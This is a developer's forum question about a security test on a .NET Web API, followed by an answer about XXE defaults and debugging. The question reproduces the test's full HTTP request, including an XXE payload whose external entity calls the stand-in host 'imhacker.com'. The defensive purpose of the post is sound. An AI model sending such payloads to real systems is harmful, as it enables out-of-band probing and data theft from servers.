We had a test conducted in our company to find out potential security vulnerabilities. We have a .NET Web API solution and only json is supported in our requests. The test conducted was as follows: A post request was made on an api endpoint with an xml in the body. The xml had a url pointing to the hackers server. Something like this
POST <url> HTTP/1.1
Content-Type: text/xml
Accept : */*
Cache-Control : no-cache
Host: <hostname>
Accept-encoding : gzip, deflate
Connection: close
Content-Length : 128
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test[
<!ENTITY & one SYSTEM "https://imhacker.com/XXE" >
%one;
]>
The api did give a response: {"Message" : "The request entity's media type 'text/xml' is not supported for this resource."}
However the tester who was monitoring traffic on the server imhacker did see request https://imhacker.com/XXE come through So I have 2 questions:
- How did this request execute despite the response saying that xml is not supported
- What is the solution? I have seen some recommendations that say: Prohibit or Ignore DTD processing. How do I apply this to all endpoints in the web api
Also I have seen some people recommending to remove the XMLFormatter but my code already does a Clear on all formatters and readds a customized json formatter only
In .NET 4.5.2 and newer XXE processing is disabled by default. If you are using lower target framework version, you should upgrade. Otherwise this means that some code which sits before Web API in the pipeline reads the request and explicitly enables XXE. You can try to add a function breakpoint to
System.Xml.XmlUrlResolver.GetEntityand send that request to see where exactly this happens.